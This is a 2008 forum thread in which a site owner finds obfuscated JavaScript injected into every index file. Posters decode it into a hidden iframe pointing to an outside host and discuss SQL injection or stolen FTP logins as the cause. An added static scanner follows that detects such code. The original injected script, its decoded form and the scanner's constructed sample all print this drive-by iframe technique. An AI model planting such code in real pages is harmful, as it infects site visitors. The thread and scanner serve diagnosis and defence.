
JavaScript appeared on my site from nowhere!

  • 16-09-2008 8:38pm
    #1
    Registered Users Posts: 9,225 ✭✭✭


    A friend emailed me today saying IE was saying my site had a virus, so I just checked out my code and found this:
    <script>document.write(String.fromCharCode(60,115,99,114,105,112,116,62,32,118,97,114,32,83,116,114,61,34,49,32,104,101,105,103,104,116,61,49,32,115,116,121,108,101,61,39,118,105,115,105,98,105,108,105,116,121,58,32,104,105,100,100,101,110,39,62,60,47,105,102,114,97,109,101,62,60,105,102,114,97,109,101,32,115,114,99,61,39,104,116,116,112,58,47,47,100,49,103,105,120,46,110,101,116,47,105,110,100,101,120,46,112,104,112,39,32,119,105,100,116,104,61,34,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,83,116,114,46,115,117,98,115,116,114,105,110,103,40,52,55,44,57,53,41,44,83,116,114,46,115,117,98,115,116,114,105,110,103,40,48,44,52,55,41,41,32,60,47,115,99,114,105,112,116,62));</script>
    

    Now I don't remember writing it and am not quite sure what it does. Any clues what it is and how it got there?


Comments

  • Registered Users Posts: 9,225 ✭✭✭Chardee MacDennis


    seems to mean this
    <script> var Str="1 height=1 style='visibility: hidden'></iframe><iframe src='http://d1gix.net/index.php' width="
    document.write(Str.substring(47,95),Str.substring(0,47)) </script>
    

    but how the f**k did it get there?

    EDIT: it got all of my index.php and index.html files, grrr...


  • Registered Users Posts: 4,386 ✭✭✭EKRIUQ


    My guess is it's a SQL injection, which is a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.

    It is in fact an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.


  • Registered Users Posts: 9,225 ✭✭✭Chardee MacDennis


    I don't understand. If it is an SQL injection attack, how is the JS turning up in the source code of all my index files? Also, I strip all user input before anything is done with it; will that not protect me in some way from these attacks...


  • Registered Users Posts: 4,386 ✭✭✭EKRIUQ


    Did you check your permissions on your index files? chmod them to 644, which should make them unwritable on the server.


  • Registered Users Posts: 9,225 ✭✭✭Chardee MacDennis


    Namesco wrote: »
    Did you check your permissions on your index files? chmod them to 644, which should make them unwritable on the server.

    They are all at 644...


  • Registered Users Posts: 4,386 ✭✭✭EKRIUQ


    I'm only guessing from experience but it's more likely the login, create account or contact us page where the attacks occur.

    Here's a link which might help http://www.trap17.com/index.php/best-way-stop-sql-injections_t23083.html


  • Registered Users Posts: 569 ✭✭✭none


    I think it's done over FTP, I mean, the files were simply replaced by the infected versions. Good thing to remember is the modification timestamp of your files so you can easily recognise if they were tampered with as in most cases copying over FTP sets the current timestamp. Basically, somebody got hold of your FTP login and password.


  • Registered Users Posts: 9,225 ✭✭✭Chardee MacDennis


    none wrote: »
    I think it's done over FTP, I mean, the files were simply replaced by the infected versions. Good thing to remember is the modification timestamp of your files so you can easily recognise if they were tampered with as in most cases copying over FTP sets the current timestamp. Basically, somebody got hold of your FTP login and password.

    Yeah, I've changed all my logins and it hasn't changed back to the infected version yet!
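
The thread's snippet hides an invisible iframe behind `String.fromCharCode`, and it was found in every index file. The following is an added example, not code from any poster: a static scanner that decodes such calls in a file's text without executing them and reports any iframe URL inside. The function names, the sample page and the placeholder host `injected.example.invalid` are assumptions constructed for illustration.

```javascript
// Added example: static scan only; decoded text is inspected, never executed.
const CHARCODE_CALL = /String\.fromCharCode\(\s*((?:\d{1,7}\s*,\s*)*\d{1,7})\s*\)/g;
const IFRAME_SRC = /<iframe\b[^>]*?\bsrc\s*=\s*['"]([^'"]+)['"]/gi;

// Turn "60,115,99,..." back into the text it encodes.
function decodeCharCodes(list) {
  const codes = list.split(",").map((n) => parseInt(n, 10));
  return codes.map((c) => String.fromCharCode(c)).join("");
}

// Return one finding per String.fromCharCode(...) call found in a file's text.
function scanPage(file, html) {
  const findings = [];
  for (const m of html.matchAll(CHARCODE_CALL)) {
    const decoded = decodeCharCodes(m[1]);
    findings.push({
      file,
      offset: m.index,
      decoded,
      iframeUrls: [...decoded.matchAll(IFRAME_SRC)].map((u) => u[1]),
      hidden: /visibility\s*:\s*hidden/i.test(decoded),
      writesToPage: /document\.write/.test(decoded),
    });
  }
  return findings;
}

// Constructed sample with the same shape as the snippet in the first post;
// the host name is a placeholder, not a value from the thread.
const encode = (s) => Array.from(s, (ch) => ch.charCodeAt(0)).join(",");
const HIDDEN_PART = `<script> var Str="1 height=1 style='visibility: hidden'></iframe>` +
  `<iframe src='http://injected.example.invalid/index.php' width="\n` +
  `document.write(Str.substring(47,95),Str.substring(0,47)) </script>`;
const SAMPLE_PAGE =
  `<html><body><h1>Home</h1>\n` +
  `<script>document.write(String.fromCharCode(${encode(HIDDEN_PART)}));</script>\n` +
  `</body></html>`;

for (const f of scanPage("index.php", SAMPLE_PAGE)) {
  console.log(`${f.file} @${f.offset}: hidden=${f.hidden} iframes=${f.iframeUrls.join(", ")}`);
}
```

Running `scanPage` over the contents of each index file, together with a look at modification timestamps, shows which files were altered and where the injected tag points.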

